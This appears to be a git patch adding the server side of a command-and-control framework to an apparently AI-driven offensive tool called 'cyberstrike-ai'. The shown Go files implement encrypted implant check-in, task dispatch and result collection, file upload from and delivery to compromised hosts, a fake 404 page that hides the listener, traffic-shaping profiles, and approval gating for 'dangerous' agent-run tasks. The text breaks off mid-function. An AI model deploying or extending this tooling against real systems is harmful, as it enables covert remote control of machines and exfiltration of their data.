From 8185539f3309fe98d153d33643648d702d66f51e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=85=AC=E6=98=8E?= <83812544+Ed1s0nZ@users.noreply.github.com> Date: Mon, 4 May 2026 03:45:24 +0800 Subject: [PATCH] Add files via upload --- internal/c2/beacon_host.go | 39 + internal/c2/crypto.go | 154 +++ internal/c2/eventbus.go | 144 ++ internal/c2/hitl_context.go | 29 + internal/c2/io.go | 22 + internal/c2/listener.go | 69 + internal/c2/listener_http.go | 549 ++++++++ internal/c2/listener_http_test.go | 129 ++ internal/c2/listener_tcp.go | 439 ++++++ internal/c2/listener_websocket.go | 297 ++++ internal/c2/manager.go | 777 +++++++++++ internal/c2/payload_builder.go | 308 +++++ internal/c2/payload_encoding.go | 25 + internal/c2/payload_oneliner.go | 190 +++ internal/c2/payload_templates/beacon.go.tmpl | 1283 ++++++++++++++++++ internal/c2/session_watchdog.go | 109 ++ internal/c2/tcp_beacon_server.go | 267 ++++ internal/c2/types.go | 258 ++++ internal/mcp/builtin/constants.go | 30 +- internal/security/executor.go | 15 +- internal/security/executor_test.go | 23 + 21 files changed, 5148 insertions(+), 8 deletions(-) create mode 100644 internal/c2/beacon_host.go create mode 100644 internal/c2/crypto.go create mode 100644 internal/c2/eventbus.go create mode 100644 internal/c2/hitl_context.go create mode 100644 internal/c2/io.go create mode 100644 internal/c2/listener.go create mode 100644 internal/c2/listener_http.go create mode 100644 internal/c2/listener_http_test.go create mode 100644 internal/c2/listener_tcp.go create mode 100644 internal/c2/listener_websocket.go create mode 100644 internal/c2/manager.go create mode 100644 internal/c2/payload_builder.go create mode 100644 internal/c2/payload_encoding.go create mode 100644 internal/c2/payload_oneliner.go create mode 100644 internal/c2/payload_templates/beacon.go.tmpl create mode 100644 internal/c2/session_watchdog.go create mode 100644 internal/c2/tcp_beacon_server.go create mode 100644 internal/c2/types.go diff --git a/internal/c2/beacon_host.go b/internal/c2/beacon_host.go new file mode 100644 index 00000000..9899c6a6 --- /dev/null +++ b/internal/c2/beacon_host.go @@ -0,0 +1,39 @@ +package c2 + +import ( + "strings" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。 +// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host(0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。 +func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string { + if h := strings.TrimSpace(explicitOverride); h != "" { + return h + } + cfg := &ListenerConfig{} + if listener != nil && listener.ConfigJSON != "" { + _ = parseJSON(listener.ConfigJSON, cfg) + } + if h := strings.TrimSpace(cfg.CallbackHost); h != "" { + return h + } + if listener == nil { + return "127.0.0.1" + } + host := strings.TrimSpace(listener.BindHost) + if host == "0.0.0.0" || host == "" || host == "::" { + host = detectExternalIP() + if host == "" { + if logger != nil { + logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host", + zap.String("listener_id", listenerID)) + } + return "127.0.0.1" + } + } + return host +} diff --git a/internal/c2/crypto.go b/internal/c2/crypto.go new file mode 100644 index 00000000..bf4c5ddd --- /dev/null +++ b/internal/c2/crypto.go @@ -0,0 +1,154 @@ +package c2 + +import ( + "crypto/aes" + "crypto/cipher" + "crypto/rand" + "encoding/base64" + "errors" + "io" +) + +// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。 +// 协议格式(base64 文本,便于 HTTP body / SSE 直接传): +// base64( nonce(12) || ciphertext+tag ) +// 设计要点: +// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC; +// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次); +// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。 + +// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出 +func GenerateAESKey() (string, error) { + key := make([]byte, 32) + if _, err := io.ReadFull(rand.Reader, key); err != nil { + return "", err + } + return base64.StdEncoding.EncodeToString(key), nil +} + +// GenerateImplantToken 生成 32 字节 token,base64 编码(implant 携带在 HTTP header 鉴权用) +func GenerateImplantToken() (string, error) { + t := make([]byte, 32) + if _, err := io.ReadFull(rand.Reader, t); err != nil { + return "", err + } + return base64.RawURLEncoding.EncodeToString(t), nil +} + +// EncryptAESGCM 加密任意明文,返回 base64(nonce||ct) +func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) { + key, err := decodeKey(keyB64) + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := io.ReadFull(rand.Reader, nonce); err != nil { + return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, nil) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +// DecryptAESGCM 解密 base64(nonce||ct),返回明文 +func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) { + key, err := decodeKey(keyB64) + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(encB64) + if err != nil { + return nil, errors.New("ciphertext base64 invalid") + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + nonceSize := gcm.NonceSize() + if len(raw) < nonceSize+16 { // 至少 nonce + tag + return nil, errors.New("ciphertext too short") + } + nonce, ct := raw[:nonceSize], raw[nonceSize:] + pt, err := gcm.Open(nil, nonce, ct, nil) + if err != nil { + return nil, errors.New("aead open failed (key mismatch or tampered)") + } + return pt, nil +} + +// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to context (e.g. session_id). +// Prevents cross-session replay: ciphertext from session A cannot be fed to session B. +func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) { + key, err := decodeKey(keyB64) + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := io.ReadFull(rand.Reader, nonce); err != nil { + return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, aad) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +// DecryptAESGCMWithAAD decrypts with AAD verification. +func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) { + key, err := decodeKey(keyB64) + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(encB64) + if err != nil { + return nil, errors.New("ciphertext base64 invalid") + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + nonceSize := gcm.NonceSize() + if len(raw) < nonceSize+16 { + return nil, errors.New("ciphertext too short") + } + nonce, ct := raw[:nonceSize], raw[nonceSize:] + pt, err := gcm.Open(nil, nonce, ct, aad) + if err != nil { + return nil, errors.New("aead open failed (key mismatch, tampered, or AAD mismatch)") + } + return pt, nil +} + +func decodeKey(keyB64 string) ([]byte, error) { + key, err := base64.StdEncoding.DecodeString(keyB64) + if err != nil { + return nil, errors.New("key base64 invalid") + } + if len(key) != 32 { + return nil, errors.New("key must be 32 bytes (AES-256)") + } + return key, nil +} diff --git a/internal/c2/eventbus.go b/internal/c2/eventbus.go new file mode 100644 index 00000000..e1527500 --- /dev/null +++ b/internal/c2/eventbus.go @@ -0,0 +1,144 @@ +package c2 + +import ( + "sync" + "sync/atomic" + "time" +) + +// Event 是 EventBus 内部传输的事件单元,是 database.C2Event 的"实时投影"。 +// 区别在于: +// - 数据库表保存全部历史,用于审计与列表分页; +// - EventBus 只缓存最近 N 条,用于 SSE/WS 实时推送给在线订阅者。 +type Event struct { + ID string `json:"id"` + Level string `json:"level"` + Category string `json:"category"` + SessionID string `json:"sessionId,omitempty"` + TaskID string `json:"taskId,omitempty"` + Message string `json:"message"` + Data map[string]interface{} `json:"data,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// EventBus 简单的内存广播总线。 +// 设计要点: +// - 多订阅者:每个订阅者有独立 buffered channel,慢消费者不会阻塞 publisher; +// - 容量满即丢弃:发布端绝不阻塞,避免 listener accept loop / beacon handler 卡住; +// - 全局过滤:订阅时可限定 SessionID/Category,前端按需订阅,省 CPU; +// - 关闭安全:Close() 后所有订阅者 chan 关闭,防止 goroutine 泄漏。 +type EventBus struct { + mu sync.RWMutex + subscribers map[string]*Subscription + closed bool +} + +// Subscription 订阅句柄 +type Subscription struct { + ID string + Ch chan *Event + SessionID string // 空表示不限制 + Category string // 空表示不限制 + Levels map[string]struct{} + dropCount atomic.Int64 +} + +// NewEventBus 创建总线 +func NewEventBus() *EventBus { + return &EventBus{subscribers: make(map[string]*Subscription)} +} + +// Subscribe 注册订阅者;返回 Subscription,调用方负责后续 Unsubscribe。 +// - bufferSize:单订阅者 channel 容量,建议 64~256; +// - sessionFilter / categoryFilter:空字符串=不限; +// - levelFilter:[]string{"warn","critical"} 这类,nil/空表示全收。 +func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription { + if bufferSize <= 0 { + bufferSize = 128 + } + sub := &Subscription{ + ID: id, + Ch: make(chan *Event, bufferSize), + SessionID: sessionFilter, + Category: categoryFilter, + } + if len(levelFilter) > 0 { + sub.Levels = make(map[string]struct{}, len(levelFilter)) + for _, l := range levelFilter { + sub.Levels[l] = struct{}{} + } + } + b.mu.Lock() + defer b.mu.Unlock() + if b.closed { + close(sub.Ch) + return sub + } + b.subscribers[id] = sub + return sub +} + +// Unsubscribe 注销订阅者并关闭 channel +func (b *EventBus) Unsubscribe(id string) { + b.mu.Lock() + defer b.mu.Unlock() + if sub, ok := b.subscribers[id]; ok { + delete(b.subscribers, id) + close(sub.Ch) + } +} + +// Publish 广播事件给所有订阅者;非阻塞,channel 满时静默丢弃 +func (b *EventBus) Publish(e *Event) { + if e == nil { + return + } + b.mu.RLock() + subs := make([]*Subscription, 0, len(b.subscribers)) + for _, s := range b.subscribers { + if s.matches(e) { + subs = append(subs, s) + } + } + closed := b.closed + b.mu.RUnlock() + if closed { + return + } + for _, s := range subs { + select { + case s.Ch <- e: + default: + s.dropCount.Add(1) + } + } +} + +// Close 关闭总线,停止所有订阅 +func (b *EventBus) Close() { + b.mu.Lock() + defer b.mu.Unlock() + if b.closed { + return + } + b.closed = true + for id, s := range b.subscribers { + close(s.Ch) + delete(b.subscribers, id) + } +} + +func (s *Subscription) matches(e *Event) bool { + if s.SessionID != "" && e.SessionID != s.SessionID { + return false + } + if s.Category != "" && e.Category != s.Category { + return false + } + if len(s.Levels) > 0 { + if _, ok := s.Levels[e.Level]; !ok { + return false + } + } + return true +} diff --git a/internal/c2/hitl_context.go b/internal/c2/hitl_context.go new file mode 100644 index 00000000..ac642233 --- /dev/null +++ b/internal/c2/hitl_context.go @@ -0,0 +1,29 @@ +package c2 + +import "context" + +type hitlRunCtxKey struct{} + +// WithHITLRunContext 将 runCtx(通常为整条 Agent / SSE 请求生命周期)挂到传入的 ctx 上。 +// MCP 工具 handler 收到的 ctx 可能是带单次工具超时的子 context,在工具 return 时会被 cancel; +// 危险任务 HITL 应通过 HITLUserContext 使用 runCtx 等待人工审批。 +func WithHITLRunContext(ctx, runCtx context.Context) context.Context { + if ctx == nil || runCtx == nil { + return ctx + } + return context.WithValue(ctx, hitlRunCtxKey{}, runCtx) +} + +// HITLUserContext 返回用于 C2 危险任务 HITL 等待的 context: +// 若曾用 WithHITLRunContext 注入更长寿命的 runCtx 则返回之,否则返回 ctx。 +func HITLUserContext(ctx context.Context) context.Context { + if ctx == nil { + return context.Background() + } + if v := ctx.Value(hitlRunCtxKey{}); v != nil { + if run, ok := v.(context.Context); ok && run != nil { + return run + } + } + return ctx +} diff --git a/internal/c2/io.go b/internal/c2/io.go new file mode 100644 index 00000000..b916a07e --- /dev/null +++ b/internal/c2/io.go @@ -0,0 +1,22 @@ +package c2 + +import ( + "encoding/base64" + "os" +) + +// 这些薄封装存在的目的: +// - 让 manager.go / handler 中的逻辑更直观,避免反复 import os; +// - 便于将来用接口抽象(譬如改成 internal/storage 的实现)做单元测试。 + +func osMkdirAll(path string, perm os.FileMode) error { + return os.MkdirAll(path, perm) +} + +func osWriteFile(path string, data []byte, perm os.FileMode) error { + return os.WriteFile(path, data, perm) +} + +func base64Decode(s string) ([]byte, error) { + return base64.StdEncoding.DecodeString(s) +} diff --git a/internal/c2/listener.go b/internal/c2/listener.go new file mode 100644 index 00000000..04063ddc --- /dev/null +++ b/internal/c2/listener.go @@ -0,0 +1,69 @@ +package c2 + +import ( + "strings" + "sync" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// Listener 监听器抽象:每种传输方式(TCP/HTTP/HTTPS/WS/DNS)都实现此接口; +// Manager 不感知具体实现细节,通过 ListenerRegistry 工厂创建。 +type Listener interface { + // Type 返回当前 listener 的类型字符串(如 "tcp_reverse") + Type() string + // Start 启动监听;如果端口被占用应返回 ErrPortInUse + Start() error + // Stop 停止监听并释放所有相关 goroutine(不应抛 panic) + Stop() error +} + +// ListenerCreationCtx 工厂初始化 listener 时收到的上下文 +type ListenerCreationCtx struct { + Listener *database.C2Listener + Config *ListenerConfig + Manager *Manager + Logger *zap.Logger +} + +// ListenerFactory 创建 listener 实例的工厂;返回的实例尚未 Start +type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error) + +// ListenerRegistry 类型 → 工厂 的注册表,由 internal/app 启动时注册具体实现, +// 测试中也可注入 mock 工厂来覆盖。 +type ListenerRegistry struct { + mu sync.RWMutex + factories map[string]ListenerFactory +} + +// NewListenerRegistry 创建空注册表 +func NewListenerRegistry() *ListenerRegistry { + return &ListenerRegistry{factories: make(map[string]ListenerFactory)} +} + +// Register 注册一种 listener 工厂 +func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) { + r.mu.Lock() + defer r.mu.Unlock() + r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f +} + +// Get 取工厂;nil 表示未注册 +func (r *ListenerRegistry) Get(typeName string) ListenerFactory { + r.mu.RLock() + defer r.mu.RUnlock() + return r.factories[strings.ToLower(strings.TrimSpace(typeName))] +} + +// RegisteredTypes 列出已注册的类型,给前端枚举用 +func (r *ListenerRegistry) RegisteredTypes() []string { + r.mu.RLock() + defer r.mu.RUnlock() + out := make([]string, 0, len(r.factories)) + for k := range r.factories { + out = append(out, k) + } + return out +} diff --git a/internal/c2/listener_http.go b/internal/c2/listener_http.go new file mode 100644 index 00000000..52bf5f18 --- /dev/null +++ b/internal/c2/listener_http.go @@ -0,0 +1,549 @@ +package c2 + +import ( + "crypto/ecdsa" + "crypto/elliptic" + "crypto/rand" + "crypto/sha256" + "crypto/subtle" + "crypto/tls" + "crypto/x509" + "crypto/x509/pkix" + "encoding/base64" + "encoding/hex" + "encoding/json" + "encoding/pem" + "errors" + "fmt" + "io" + "math/big" + mrand "math/rand" + "net" + "net/http" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// HTTPBeaconListener 实现 HTTP/HTTPS Beacon: +// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body); +// - 服务端解密、登记会话、回执 sleep + 是否有任务; +// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表; +// - 任务完成后 POST {result_path} 回传结果。 +// +// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。 +type HTTPBeaconListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + useTLS bool + profile *database.C2Profile + + srv *http.Server + mu sync.Mutex + stopCh chan struct{} + stopped bool +} + +// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"]) +func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) { + return &HTTPBeaconListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + useTLS: false, + stopCh: make(chan struct{}), + }, nil +} + +// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"]) +func NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) { + return &HTTPBeaconListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + useTLS: true, + stopCh: make(chan struct{}), + }, nil +} + +// Type 类型字符串 +func (l *HTTPBeaconListener) Type() string { + if l.useTLS { + return string(ListenerTypeHTTPSBeacon) + } + return string(ListenerTypeHTTPBeacon) +} + +// Start 起 HTTP server +func (l *HTTPBeaconListener) Start() error { + // Load Malleable Profile if configured + l.loadProfile() + + mux := http.NewServeMux() + mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn)) + mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks)) + mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult)) + mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload)) + mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe)) + + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + l.srv = &http.Server{ + Addr: addr, + Handler: mux, + ReadHeaderTimeout: 15 * time.Second, + ReadTimeout: 60 * time.Second, + WriteTimeout: 120 * time.Second, + IdleTimeout: 300 * time.Second, + } + + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + + if l.useTLS { + tlsConfig, err := l.buildTLSConfig() + if err != nil { + _ = ln.Close() + return fmt.Errorf("build TLS config: %w", err) + } + l.srv.TLSConfig = tlsConfig + go func() { + if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err)) + } + }() + } else { + go func() { + if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("http_beacon Serve exited", zap.Error(err)) + } + }() + } + return nil +} + +// Stop 关闭 +func (l *HTTPBeaconListener) Stop() error { + l.mu.Lock() + if l.stopped { + l.mu.Unlock() + return nil + } + l.stopped = true + close(l.stopCh) + l.mu.Unlock() + if l.srv != nil { + ctx, cancel := contextWithTimeout(5 * time.Second) + defer cancel() + _ = l.srv.Shutdown(ctx) + } + return nil +} + +// ---------------------------------------------------------------------------- +// HTTP handlers +// ---------------------------------------------------------------------------- + +func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + + // 尝试 AES-GCM 解密(完整 beacon 二进制走加密通道) + var req ImplantCheckInRequest + plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if decErr == nil { + if err := json.Unmarshal(plaintext, &req); err != nil { + l.disguisedReject(w) + return + } + } else { + // 解密失败:尝试当作明文 JSON(兼容 curl oneliner 等轻量级客户端) + if err := json.Unmarshal(body, &req); err != nil { + l.disguisedReject(w) + return + } + } + isPlaintext := decErr != nil + + if req.UserAgent == "" { + req.UserAgent = r.UserAgent() + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + // curl oneliner 可能不携带完整字段,用 remote IP + listener ID 生成稳定标识 + host, _, _ := net.SplitHostPort(r.RemoteAddr) + if strings.TrimSpace(req.ImplantUUID) == "" { + // 基于 IP + listener ID 生成稳定 UUID,同一 IP 多次 check_in 复用同一会话 + req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID)) + } + if strings.TrimSpace(req.Hostname) == "" { + req.Hostname = "curl_" + host + } + if strings.TrimSpace(req.InternalIP) == "" { + req.InternalIP = host + } + if strings.TrimSpace(req.OS) == "" { + req.OS = "unknown" + } + if strings.TrimSpace(req.Arch) == "" { + req.Arch = "unknown" + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + http.Error(w, "ingest failed", http.StatusInternalServerError) + return + } + queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: session.ID, + Status: string(TaskQueued), + Limit: 1, + }) + resp := ImplantCheckInResponse{ + SessionID: session.ID, + NextSleep: session.SleepSeconds, + NextJitter: session.JitterPercent, + HasTasks: len(queued) > 0, + ServerTime: time.Now().UnixMilli(), + } + if isPlaintext { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodGet { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + sessionID := r.URL.Query().Get("session_id") + if sessionID == "" { + l.disguisedReject(w) + return + } + session, err := l.manager.DB().GetC2Session(sessionID) + if err != nil || session == nil { + l.disguisedReject(w) + return + } + envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50) + if err != nil { + http.Error(w, "pop tasks failed", http.StatusInternalServerError) + return + } + if envelopes == nil { + envelopes = []TaskEnvelope{} + } + resp := map[string]interface{}{"tasks": envelopes} + if l.isPlaintextClient(r) { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + var report TaskResultReport + plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if decErr == nil { + if err := json.Unmarshal(plaintext, &report); err != nil { + l.disguisedReject(w) + return + } + } else { + if err := json.Unmarshal(body, &report); err != nil { + l.disguisedReject(w) + return + } + } + if err := l.manager.IngestTaskResult(report); err != nil { + http.Error(w, "ingest result failed", http.StatusInternalServerError) + return + } + resp := map[string]string{"ok": "1"} + if l.isPlaintextClient(r) { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。 +// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。 +func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + taskID := r.URL.Query().Get("task_id") + if taskID == "" { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if err != nil { + l.disguisedReject(w) + return + } + dir := filepath.Join(l.manager.StorageDir(), "uploads") + if err := os.MkdirAll(dir, 0o755); err != nil { + http.Error(w, "mkdir failed", http.StatusInternalServerError) + return + } + dst := filepath.Join(dir, taskID+".bin") + if err := os.WriteFile(dst, plaintext, 0o644); err != nil { + http.Error(w, "save failed", http.StatusInternalServerError) + return + } + l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)}) +} + +// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。 +// 路径形如 /file/,文件内容经 AES-GCM 加密后返回。 +func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodGet { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + prefix := l.cfg.BeaconFilePath + taskID := strings.TrimPrefix(r.URL.Path, prefix) + if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") { + l.disguisedReject(w) + return + } + fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin") + absPath, err := filepath.Abs(fpath) + if err != nil { + l.disguisedReject(w) + return + } + absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream")) + if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) { + l.disguisedReject(w) + return + } + data, err := os.ReadFile(absPath) + if err != nil { + l.disguisedReject(w) + return + } + l.writeEncrypted(w, map[string]interface{}{ + "file_data": base64Encode(data), + }) +} + +// ---------------------------------------------------------------------------- +// 鉴权 / 输出辅助 +// ---------------------------------------------------------------------------- + +// checkImplantToken 校验 X-Implant-Token header(恒定时间比较防止时序攻击) +func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool { + got := r.Header.Get("X-Implant-Token") + if got == "" { + got = r.Header.Get("Cookie") // 兼容 Malleable Profile 用 Cookie 携带 + } + expected := l.rec.ImplantToken + if got == "" || expected == "" { + return false + } + return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1 +} + +// disguisedReject 鉴权失败时返回 404,避免暴露 listener 是 C2 +func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) { + w.Header().Set("Content-Type", "text/html; charset=utf-8") + w.WriteHeader(http.StatusNotFound) + _, _ = fmt.Fprint(w, "

404 Not Found

") +} + +// writeEncrypted JSON 序列化 + AES-GCM 加密 + 写回 +func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) { + body, err := json.Marshal(payload) + if err != nil { + http.Error(w, "encode failed", http.StatusInternalServerError) + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + http.Error(w, "encrypt failed", http.StatusInternalServerError) + return + } + w.Header().Set("Content-Type", "application/octet-stream") + _, _ = w.Write([]byte(enc)) +} + +// loadProfile loads Malleable Profile from DB if the listener has a profile_id configured +func (l *HTTPBeaconListener) loadProfile() { + if l.rec.ProfileID == "" { + return + } + profile, err := l.manager.GetProfile(l.rec.ProfileID) + if err != nil || profile == nil { + l.logger.Warn("加载 Malleable Profile 失败,使用默认配置", + zap.String("profile_id", l.rec.ProfileID), zap.Error(err)) + return + } + l.profile = profile + l.logger.Info("Malleable Profile 已加载", + zap.String("profile_id", profile.ID), + zap.String("profile_name", profile.Name), + zap.String("user_agent", profile.UserAgent)) +} + +// withProfileHeaders wraps a handler to inject Malleable Profile response headers +func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + if l.profile != nil && len(l.profile.ResponseHeaders) > 0 { + for k, v := range l.profile.ResponseHeaders { + w.Header().Set(k, v) + } + } + next(w, r) + } +} + +// ---------------------------------------------------------------------------- +// TLS 自签证书(仅供测试 / Phase 2 默认行为) +// ---------------------------------------------------------------------------- + +func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) { + // 操作员显式提供证书 → 优先使用 + if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" { + cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath) + if err == nil { + return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil + } + l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err)) + } + // 自签证书:CN 用 listener 名,避免重复 + cert, err := generateSelfSignedCert(l.rec.Name) + if err != nil { + return nil, err + } + return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil +} + +func generateSelfSignedCert(cn string) (tls.Certificate, error) { + priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) + if err != nil { + return tls.Certificate{}, err + } + serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62)) + tmpl := &x509.Certificate{ + SerialNumber: serial, + Subject: pkix.Name{CommonName: cn}, + NotBefore: time.Now().Add(-1 * time.Hour), + NotAfter: time.Now().Add(365 * 24 * time.Hour), + KeyUsage: x509.KeyUsageDigitalSignature, + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, + IPAddresses: []net.IP{net.ParseIP("127.0.0.1")}, + DNSNames: []string{"localhost"}, + } + der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv) + if err != nil { + return tls.Certificate{}, err + } + keyDER, err := x509.MarshalECPrivateKey(priv) + if err != nil { + return tls.Certificate{}, err + } + certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}) + keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER}) + return tls.X509KeyPair(certPEM, keyPEM) +} + +func base64Encode(data []byte) string { + return base64.StdEncoding.EncodeToString(data) +} + +func shortHash(s string) string { + h := sha256.Sum256([]byte(s)) + return hex.EncodeToString(h[:6]) +} + +// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等) +// 完整 beacon 二进制会设置 Content-Type: application/octet-stream +func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool { + ct := 